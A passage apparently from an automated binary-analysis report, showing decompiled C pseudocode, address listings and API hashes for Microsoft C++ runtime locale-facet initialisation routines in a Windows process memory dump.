                                                                                                																														} else {
                                                                                                																															_t594 = _v16;
                                                                                                																															_v16 = _t594;
                                                                                                																															_v4 = 1;
                                                                                                																															E00F85472(_t594);
                                                                                                																															 *0xfb81fc();
                                                                                                																															 *((intOrPtr*)( *((intOrPtr*)( *_t594 + 4))))();
                                                                                                																															 *0xfd0ae4 = _t594;
                                                                                                																															goto L61;
                                                                                                																														}
                                                                                                																													} else {
                                                                                                																														_t594 = _t611;
                                                                                                																														goto L61;
                                                                                                																													}
                                                                                                																												}
                                                                                                																											} else {
                                                                                                																												_t593 = _v16;
                                                                                                																												_v16 = _t593;
                                                                                                																												_v4 = 1;
                                                                                                																												E00F85472(_t593);
                                                                                                																												 *0xfb81fc();
                                                                                                																												 *((intOrPtr*)( *((intOrPtr*)( *_t593 + 4))))();
                                                                                                																												 *0xfd0b10 = _t593;
                                                                                                																												goto L54;
                                                                                                																											}
                                                                                                																										} else {
                                                                                                																											_t593 = _t610;
                                                                                                																											goto L54;
                                                                                                																										}
                                                                                                																									}
                                                                                                																								} else {
                                                                                                																									_t592 = _v16;
                                                                                                																									_v16 = _t592;
                                                                                                																									_v4 = 1;
                                                                                                																									E00F85472(_t592);
                                                                                                																									 *0xfb81fc();
                                                                                                																									 *((intOrPtr*)( *((intOrPtr*)( *_t592 + 4))))();
                                                                                                																									 *0xfd0b14 = _t592;
                                                                                                																									goto L47;
                                                                                                																								}
                                                                                                																							} else {
                                                                                                																								_t592 = _t609;
                                                                                                																								goto L47;
                                                                                                																							}
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t591 = _v16;
                                                                                                																						_v16 = _t591;
                                                                                                																						_v4 = 1;
                                                                                                																						E00F85472(_t591);
                                                                                                																						 *0xfb81fc();
                                                                                                																						 *((intOrPtr*)( *((intOrPtr*)( *_t591 + 4))))();
                                                                                                																						 *0xfd0adc = _t591;
                                                                                                																						goto L40;
                                                                                                																					}
                                                                                                																				} else {
                                                                                                																					_t591 = _t608;
                                                                                                																					goto L40;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			_t590 = _v16;
                                                                                                																			_v16 = _t590;
                                                                                                																			_v4 = 1;
                                                                                                																			E00F85472(_t590);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t590 + 4))))();
                                                                                                																			 *0xfd0b0c = _t590;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t590 = _t607;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t589 = _v16;
                                                                                                																_v16 = _t589;
                                                                                                																_v4 = 1;
                                                                                                																E00F85472(_t589);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t589 + 4))))();
                                                                                                																 *0xfd0ad8 = _t589;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t589 = _t606;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t588 = _v16;
                                                                                                													_v16 = _t588;
                                                                                                													_v4 = 1;
                                                                                                													E00F85472(_t588);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t588 + 4))))();
                                                                                                													 *0xfd0b08 = _t588;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t588 = _t605;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t587 = _v16;
                                                                                                										_v16 = _t587;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t587);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t587 + 4))))();
                                                                                                										 *0xfd0ad4 = _t587;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t587 = _t604;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t586 = _v16;
                                                                                                							_v16 = _t586;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t586);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t586 + 4))))();
                                                                                                							 *0xfd0b04 = _t586;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t586 = _t603;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}











































                                                                                                0x00f8712f
                                                                                                0x00f87136
                                                                                                0x00f87140
                                                                                                0x00f87145
                                                                                                0x00f87150
                                                                                                0x00f87154
                                                                                                0x00f87160
                                                                                                0x00f87165
                                                                                                0x00f87169
                                                                                                0x00f871ae
                                                                                                0x00f871b1
                                                                                                0x00f871bd
                                                                                                0x00f8716b
                                                                                                0x00f8716d
                                                                                                0x00f87173
                                                                                                0x00f87179
                                                                                                0x00f87181
                                                                                                0x00f87184
                                                                                                0x00f871be
                                                                                                0x00f871c3
                                                                                                0x00f871c4
                                                                                                0x00f871cb
                                                                                                0x00f871d5
                                                                                                0x00f871da
                                                                                                0x00f871e5
                                                                                                0x00f871e9
                                                                                                0x00f871fa
                                                                                                0x00f871fc
                                                                                                0x00f871fe
                                                                                                0x00f87243
                                                                                                0x00f87246
                                                                                                0x00f87252
                                                                                                0x00f87200
                                                                                                0x00f87200
                                                                                                0x00f87202
                                                                                                0x00f87208
                                                                                                0x00f8720e
                                                                                                0x00f87216
                                                                                                0x00f87219
                                                                                                0x00f87253
                                                                                                0x00f87258
                                                                                                0x00f87259
                                                                                                0x00f87260
                                                                                                0x00f8726a
                                                                                                0x00f8726f
                                                                                                0x00f8727a
                                                                                                0x00f8727e
                                                                                                0x00f8728f
                                                                                                0x00f87291
                                                                                                0x00f87293
                                                                                                0x00f872d8
                                                                                                0x00f872db
                                                                                                0x00f872e7
                                                                                                0x00f87295
                                                                                                0x00f87295
                                                                                                0x00f87297
                                                                                                0x00f8729d
                                                                                                0x00f872a3
                                                                                                0x00f872ab
                                                                                                0x00f872ae
                                                                                                0x00f872e8
                                                                                                0x00f872ed
                                                                                                0x00f872ee
                                                                                                0x00f872f5
                                                                                                0x00f872ff
                                                                                                0x00f87304
                                                                                                0x00f8730f
                                                                                                0x00f87313
                                                                                                0x00f87324
                                                                                                0x00f87326
                                                                                                0x00f87328
                                                                                                0x00f8736d
                                                                                                0x00f87370
                                                                                                0x00f8737c
                                                                                                0x00f8732a
                                                                                                0x00f8732a
                                                                                                0x00f8732c
                                                                                                0x00f87332
                                                                                                0x00f87338
                                                                                                0x00f87340
                                                                                                0x00f87343
                                                                                                0x00f8737d
                                                                                                0x00f87382
                                                                                                0x00f87383
                                                                                                0x00f8738a
                                                                                                0x00f87394
                                                                                                0x00f87399
                                                                                                0x00f873a4
                                                                                                0x00f873a8
                                                                                                0x00f873b9
                                                                                                0x00f873bb
                                                                                                0x00f873bd
                                                                                                0x00f87402
                                                                                                0x00f87405
                                                                                                0x00f87411
                                                                                                0x00f873bf
                                                                                                0x00f873bf
                                                                                                0x00f873c1
                                                                                                0x00f873c7
                                                                                                0x00f873cd
                                                                                                0x00f873d5
                                                                                                0x00f873d8
                                                                                                0x00f87412
                                                                                                0x00f87417
                                                                                                0x00f87418
                                                                                                0x00f8741f
                                                                                                0x00f87429
                                                                                                0x00f8742e
                                                                                                0x00f87439
                                                                                                0x00f8743d
                                                                                                0x00f8744e
                                                                                                0x00f87450
                                                                                                0x00f87452
                                                                                                0x00f87497
                                                                                                0x00f8749a
                                                                                                0x00f874a6
                                                                                                0x00f87454
                                                                                                0x00f87454
                                                                                                0x00f87456
                                                                                                0x00f8745c
                                                                                                0x00f87462
                                                                                                0x00f8746a
                                                                                                0x00f8746d
                                                                                                0x00f874a7
                                                                                                0x00f874ac
                                                                                                0x00f874ad
                                                                                                0x00f874b4
                                                                                                0x00f874be
                                                                                                0x00f874c3
                                                                                                0x00f874ce
                                                                                                0x00f874d2
                                                                                                0x00f874e3
                                                                                                0x00f874e5
                                                                                                0x00f874e7
                                                                                                0x00f8752c
                                                                                                0x00f8752f
                                                                                                0x00f8753b
                                                                                                0x00f874e9
                                                                                                0x00f874e9
                                                                                                0x00f874eb
                                                                                                0x00f874f1
                                                                                                0x00f874f7
                                                                                                0x00f874ff
                                                                                                0x00f87502
                                                                                                0x00f8753c
                                                                                                0x00f87541
                                                                                                0x00f87542
                                                                                                0x00f87549
                                                                                                0x00f87553
                                                                                                0x00f87558
                                                                                                0x00f87563
                                                                                                0x00f87567
                                                                                                0x00f87578
                                                                                                0x00f8757a
                                                                                                0x00f8757c
                                                                                                0x00f875c1
                                                                                                0x00f875c4
                                                                                                0x00f875d0
                                                                                                0x00f8757e
                                                                                                0x00f8757e
                                                                                                0x00f87580
                                                                                                0x00f87586
                                                                                                0x00f8758c
                                                                                                0x00f87594
                                                                                                0x00f87597
                                                                                                0x00f875d1
                                                                                                0x00f875d6
                                                                                                0x00f875d7
                                                                                                0x00f875de
                                                                                                0x00f875e8
                                                                                                0x00f875ed
                                                                                                0x00f875f8
                                                                                                0x00f875fc
                                                                                                0x00f8760d
                                                                                                0x00f8760f
                                                                                                0x00f87611
                                                                                                0x00f87656
                                                                                                0x00f87659
                                                                                                0x00f87665
                                                                                                0x00f87613
                                                                                                0x00f87613
                                                                                                0x00f87615
                                                                                                0x00f8761b
                                                                                                0x00f87621
                                                                                                0x00f87629
                                                                                                0x00f8762c
                                                                                                0x00f87666
                                                                                                0x00f8766b
                                                                                                0x00f8766c
                                                                                                0x00f87673
                                                                                                0x00f8767d
                                                                                                0x00f87682
                                                                                                0x00f8768d
                                                                                                0x00f87691
                                                                                                0x00f876a2
                                                                                                0x00f876a4
                                                                                                0x00f876a6
                                                                                                0x00f876eb
                                                                                                0x00f876ee
                                                                                                0x00f876fa
                                                                                                0x00f876a8
                                                                                                0x00f876a8
                                                                                                0x00f876aa
                                                                                                0x00f876b0
                                                                                                0x00f876b6
                                                                                                0x00f876be
                                                                                                0x00f876c1
                                                                                                0x00f876fb
                                                                                                0x00f87700
                                                                                                0x00f87701
                                                                                                0x00f87708
                                                                                                0x00f87712
                                                                                                0x00f87717
                                                                                                0x00f87722
                                                                                                0x00f87726
                                                                                                0x00f87737
                                                                                                0x00f87739
                                                                                                0x00f8773b
                                                                                                0x00f87780
                                                                                                0x00f87783
                                                                                                0x00f8778f
                                                                                                0x00f8773d
                                                                                                0x00f8773d
                                                                                                0x00f8773f
                                                                                                0x00f87745
                                                                                                0x00f8774b
                                                                                                0x00f87753
                                                                                                0x00f87756
                                                                                                0x00f87790
                                                                                                0x00f87795
                                                                                                0x00f87796
                                                                                                0x00f8779d
                                                                                                0x00f877a7
                                                                                                0x00f877ac
                                                                                                0x00f877b7
                                                                                                0x00f877bb
                                                                                                0x00f877cc
                                                                                                0x00f877ce
                                                                                                0x00f877d0
                                                                                                0x00f87815
                                                                                                0x00f87818
                                                                                                0x00f87824
                                                                                                0x00f877d2
                                                                                                0x00f877d2
                                                                                                0x00f877d4
                                                                                                0x00f877da
                                                                                                0x00f877e0
                                                                                                0x00f877e8
                                                                                                0x00f877eb
                                                                                                0x00f87825
                                                                                                0x00f8782a
                                                                                                0x00f8782b
                                                                                                0x00f87832
                                                                                                0x00f8783c
                                                                                                0x00f87841
                                                                                                0x00f8784c
                                                                                                0x00f87850
                                                                                                0x00f87861
                                                                                                0x00f87863
                                                                                                0x00f87865
                                                                                                0x00f878aa
                                                                                                0x00f878ad
                                                                                                0x00f878b9
                                                                                                0x00f87867
                                                                                                0x00f87867
                                                                                                0x00f87869
                                                                                                0x00f8786f
                                                                                                0x00f87875
                                                                                                0x00f8787d
                                                                                                0x00f87880
                                                                                                0x00f878ba
                                                                                                0x00f878bf
                                                                                                0x00f878c0
                                                                                                0x00f878c7
                                                                                                0x00f878d1
                                                                                                0x00f878d6
                                                                                                0x00f878e1
                                                                                                0x00f878e5
                                                                                                0x00f878f6
                                                                                                0x00f878f8
                                                                                                0x00f878fa
                                                                                                0x00f8793f
                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4
                                                                                                0x00f87758
                                                                                                0x00f87758
                                                                                                0x00f8775b
                                                                                                0x00f8775f
                                                                                                0x00f87763
                                                                                                0x00f87770
                                                                                                0x00f87778
                                                                                                0x00f8777a
                                                                                                0x00000000
                                                                                                0x00f8777a
                                                                                                0x00f87741
                                                                                                0x00f87741
                                                                                                0x00000000
                                                                                                0x00f87741
                                                                                                0x00f8773f
                                                                                                0x00f876c3
                                                                                                0x00f876c3
                                                                                                0x00f876c6
                                                                                                0x00f876ca
                                                                                                0x00f876ce
                                                                                                0x00f876db
                                                                                                0x00f876e3
                                                                                                0x00f876e5
                                                                                                0x00000000
                                                                                                0x00f876e5
                                                                                                0x00f876ac
                                                                                                0x00f876ac
                                                                                                0x00000000
                                                                                                0x00f876ac
                                                                                                0x00f876aa
                                                                                                0x00f8762e
                                                                                                0x00f8762e
                                                                                                0x00f87631
                                                                                                0x00f87635
                                                                                                0x00f87639
                                                                                                0x00f87646
                                                                                                0x00f8764e
                                                                                                0x00f87650
                                                                                                0x00000000
                                                                                                0x00f87650
                                                                                                0x00f87617
                                                                                                0x00f87617
                                                                                                0x00000000
                                                                                                0x00f87617
                                                                                                0x00f87615
                                                                                                0x00f87599
                                                                                                0x00f87599
                                                                                                0x00f8759c
                                                                                                0x00f875a0
                                                                                                0x00f875a4
                                                                                                0x00f875b1
                                                                                                0x00f875b9
                                                                                                0x00f875bb
                                                                                                0x00000000
                                                                                                0x00f875bb
                                                                                                0x00f87582
                                                                                                0x00f87582
                                                                                                0x00000000
                                                                                                0x00f87582
                                                                                                0x00f87580
                                                                                                0x00f87504
                                                                                                0x00f87504
                                                                                                0x00f87507
                                                                                                0x00f8750b
                                                                                                0x00f8750f
                                                                                                0x00f8751c
                                                                                                0x00f87524
                                                                                                0x00f87526
                                                                                                0x00000000
                                                                                                0x00f87526
                                                                                                0x00f874ed
                                                                                                0x00f874ed
                                                                                                0x00000000
                                                                                                0x00f874ed
                                                                                                0x00f874eb
                                                                                                0x00f8746f
                                                                                                0x00f8746f
                                                                                                0x00f87472
                                                                                                0x00f87476
                                                                                                0x00f8747a
                                                                                                0x00f87487
                                                                                                0x00f8748f
                                                                                                0x00f87491
                                                                                                0x00000000
                                                                                                0x00f87491
                                                                                                0x00f87458
                                                                                                0x00f87458
                                                                                                0x00000000
                                                                                                0x00f87458
                                                                                                0x00f87456
                                                                                                0x00f873da
                                                                                                0x00f873da
                                                                                                0x00f873dd
                                                                                                0x00f873e1
                                                                                                0x00f873e5
                                                                                                0x00f873f2
                                                                                                0x00f873fa
                                                                                                0x00f873fc
                                                                                                0x00000000
                                                                                                0x00f873fc
                                                                                                0x00f873c3
                                                                                                0x00f873c3
                                                                                                0x00000000
                                                                                                0x00f873c3
                                                                                                0x00f873c1
                                                                                                0x00f87345
                                                                                                0x00f87345
                                                                                                0x00f87348
                                                                                                0x00f8734c
                                                                                                0x00f87350
                                                                                                0x00f8735d
                                                                                                0x00f87365
                                                                                                0x00f87367
                                                                                                0x00000000
                                                                                                0x00f87367
                                                                                                0x00f8732e
                                                                                                0x00f8732e
                                                                                                0x00000000
                                                                                                0x00f8732e
                                                                                                0x00f8732c
                                                                                                0x00f872b0
                                                                                                0x00f872b0
                                                                                                0x00f872b3
                                                                                                0x00f872b7
                                                                                                0x00f872bb
                                                                                                0x00f872c8
                                                                                                0x00f872d0
                                                                                                0x00f872d2
                                                                                                0x00000000
                                                                                                0x00f872d2
                                                                                                0x00f87299
                                                                                                0x00f87299
                                                                                                0x00000000
                                                                                                0x00f87299
                                                                                                0x00f87297
                                                                                                0x00f8721b
                                                                                                0x00f8721b
                                                                                                0x00f8721e
                                                                                                0x00f87222
                                                                                                0x00f87226
                                                                                                0x00f87233
                                                                                                0x00f8723b
                                                                                                0x00f8723d
                                                                                                0x00000000
                                                                                                0x00f8723d
                                                                                                0x00f87204
                                                                                                0x00f87204
                                                                                                0x00000000
                                                                                                0x00f87204
                                                                                                0x00f87202
                                                                                                0x00f87186
                                                                                                0x00f87186
                                                                                                0x00f87189
                                                                                                0x00f8718d
                                                                                                0x00f87191
                                                                                                0x00f8719e
                                                                                                0x00f871a6
                                                                                                0x00f871a8
                                                                                                0x00000000
                                                                                                0x00f871a8
                                                                                                0x00f8716f
                                                                                                0x00f8716f
                                                                                                0x00000000
                                                                                                0x00f8716f
                                                                                                0x00f8716d

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F87136
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F87140
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • messages.LIBCPMT ref: 00F8717A
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F87191
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F871B1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                • String ID:
                                                                                                • API String ID: 2750803064-0
                                                                                                • Opcode ID: 15ad47a009db8588bf7586881e8be9e0ee599e3c7137aeb1c7b9a680e04ff740
                                                                                                • Instruction ID: a0ed2480b282a13b2c72297d90dc08f3090dceb2392ac540b1923c8c5de1283b
                                                                                                • Opcode Fuzzy Hash: 15ad47a009db8588bf7586881e8be9e0ee599e3c7137aeb1c7b9a680e04ff740
                                                                                                • Instruction Fuzzy Hash: 2E01C8359046199BCB05FB64CC057ED7771AF84760F24410AE405A7391DF78DE05FB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F912C6(void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				signed int _t107;
                                                                                                				void* _t189;
                                                                                                				signed int _t276;
                                                                                                				void* _t301;
                                                                                                				signed int _t304;
                                                                                                				signed int _t305;
                                                                                                				signed int _t306;
                                                                                                				signed int _t307;
                                                                                                				signed int _t308;
                                                                                                				signed int _t309;
                                                                                                				signed int _t310;
                                                                                                				signed int _t312;
                                                                                                				signed int _t313;
                                                                                                				signed int _t314;
                                                                                                				signed int _t315;
                                                                                                				signed int _t316;
                                                                                                				signed int _t317;
                                                                                                				signed int _t318;
                                                                                                				signed int _t319;
                                                                                                				signed int _t320;
                                                                                                				void* _t329;
                                                                                                
                                                                                                				_t301 = __edx;
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6(_t329 - 0x14, 0);
                                                                                                				_t312 =  *0xfd0b44; // 0x0
                                                                                                				 *(_t329 - 4) =  *(_t329 - 4) & 0x00000000;
                                                                                                				 *(_t329 - 0x10) = _t312;
                                                                                                				_t107 = E00F78A40( *((intOrPtr*)(_t329 + 8)), E00F789D0());
                                                                                                				_t303 = _t107;
                                                                                                				if(_t107 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E(_t329 - 0x14);
                                                                                                					return E00FB388C(_t303);
                                                                                                				} else {
                                                                                                					if(_t312 == 0) {
                                                                                                						_push( *((intOrPtr*)(_t329 + 8)));
                                                                                                						_push(_t329 - 0x10);
                                                                                                						__eflags = E00F91875(_t301, _t303, _t312, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t303, _t312);
                                                                                                							E00F856E6(_t329 - 0x14, 0);
                                                                                                							_t313 =  *0xfd0b48; // 0x0
                                                                                                							 *(_t329 - 4) =  *(_t329 - 4) & 0x00000000;
                                                                                                							 *(_t329 - 0x10) = _t313;
                                                                                                							_t304 = E00F78A40( *((intOrPtr*)(_t329 + 8)), E00F789D0());
                                                                                                							__eflags = _t304;
                                                                                                							if(_t304 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E(_t329 - 0x14);
                                                                                                								return E00FB388C(_t304);
                                                                                                							} else {
                                                                                                								__eflags = _t313;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push( *((intOrPtr*)(_t329 + 8)));
                                                                                                									_push(_t329 - 0x10);
                                                                                                									__eflags = E00F91917(_t304, _t313, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t304, _t313);
                                                                                                										E00F856E6(_t329 - 0x14, 0);
                                                                                                										_t314 =  *0xfd0b4c; // 0x0
                                                                                                										 *(_t329 - 4) =  *(_t329 - 4) & 0x00000000;
                                                                                                										 *(_t329 - 0x10) = _t314;
                                                                                                										_t305 = E00F78A40( *((intOrPtr*)(_t329 + 8)), E00F789D0());
                                                                                                										__eflags = _t305;
                                                                                                										if(_t305 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E(_t329 - 0x14);
                                                                                                											return E00FB388C(_t305);
                                                                                                										} else {
                                                                                                											__eflags = _t314;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push( *((intOrPtr*)(_t329 + 8)));
                                                                                                												_push(_t329 - 0x10);
                                                                                                												__eflags = E00F9197F(_t305, _t314, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t305, _t314);
                                                                                                													E00F856E6(_t329 - 0x14, 0);
                                                                                                													_t315 =  *0xfd0b50; // 0x0
                                                                                                													 *(_t329 - 4) =  *(_t329 - 4) & 0x00000000;
                                                                                                													 *(_t329 - 0x10) = _t315;
                                                                                                													_t306 = E00F78A40( *((intOrPtr*)(_t329 + 8)), E00F789D0());
                                                                                                													__eflags = _t306;
                                                                                                													if(_t306 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E(_t329 - 0x14);
                                                                                                														return E00FB388C(_t306);
                                                                                                													} else {
                                                                                                														__eflags = _t315;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push( *((intOrPtr*)(_t329 + 8)));
                                                                                                															_push(_t329 - 0x10);
                                                                                                															__eflags = E00F919E7(_t306, _t315, __eflags) - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(8);
                                                                                                																E00FB38B2(0xfb6ebe, _t306, _t315);
                                                                                                																E00F856E6(_t329 - 0x14, 0);
                                                                                                																_t316 =  *0xfd0b58; // 0x0
                                                                                                																 *(_t329 - 4) =  *(_t329 - 4) & 0x00000000;
                                                                                                																 *(_t329 - 0x10) = _t316;
                                                                                                																_t307 = E00F78A40( *((intOrPtr*)(_t329 + 8)), E00F789D0());
                                                                                                																__eflags = _t307;
                                                                                                																if(_t307 != 0) {
                                                                                                																	L33:
                                                                                                																	E00F8573E(_t329 - 0x14);
                                                                                                																	return E00FB388C(_t307);
                                                                                                																} else {
                                                                                                																	__eflags = _t316;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_push( *((intOrPtr*)(_t329 + 8)));
                                                                                                																		_push(_t329 - 0x10);
                                                                                                																		__eflags = E00F91A4F(_t307, _t316, __eflags) - 0xffffffff;
                                                                                                																		if(__eflags == 0) {
                                                                                                																			E00F78FE0(__eflags);
                                                                                                																			asm("int3");
                                                                                                																			_push(8);
                                                                                                																			E00FB38B2(0xfb6ebe, _t307, _t316);
                                                                                                																			E00F856E6(_t329 - 0x14, 0);
                                                                                                																			_t317 =  *0xfd0b54; // 0x0
                                                                                                																			 *(_t329 - 4) =  *(_t329 - 4) & 0x00000000;
                                                                                                																			 *(_t329 - 0x10) = _t317;
                                                                                                																			_t308 = E00F78A40( *((intOrPtr*)(_t329 + 8)), E00F789D0());
                                                                                                																			__eflags = _t308;
                                                                                                																			if(_t308 != 0) {
                                                                                                																				L40:
                                                                                                																				E00F8573E(_t329 - 0x14);
                                                                                                																				return E00FB388C(_t308);
                                                                                                																			} else {
                                                                                                																				__eflags = _t317;
                                                                                                																				if(__eflags == 0) {
                                                                                                																					_push( *((intOrPtr*)(_t329 + 8)));
                                                                                                																					_push(_t329 - 0x10);
                                                                                                																					__eflags = E00F91AD3(_t308, _t317, __eflags) - 0xffffffff;
                                                                                                																					if(__eflags == 0) {
                                                                                                																						E00F78FE0(__eflags);
                                                                                                																						asm("int3");
                                                                                                																						_push(8);
                                                                                                																						E00FB38B2(0xfb6ebe, _t308, _t317);
                                                                                                																						E00F856E6(_t329 - 0x14, 0);
                                                                                                																						_t318 =  *0xfd0b5c; // 0x0
                                                                                                																						 *(_t329 - 4) =  *(_t329 - 4) & 0x00000000;
                                                                                                																						 *(_t329 - 0x10) = _t318;
                                                                                                																						_t309 = E00F78A40( *((intOrPtr*)(_t329 + 8)), E00F789D0());
                                                                                                																						__eflags = _t309;
                                                                                                																						if(_t309 != 0) {
                                                                                                																							L47:
                                                                                                																							E00F8573E(_t329 - 0x14);
                                                                                                																							return E00FB388C(_t309);
                                                                                                																						} else {
                                                                                                																							__eflags = _t318;
                                                                                                																							if(__eflags == 0) {
                                                                                                																								_push( *((intOrPtr*)(_t329 + 8)));
                                                                                                																								_push(_t329 - 0x10);
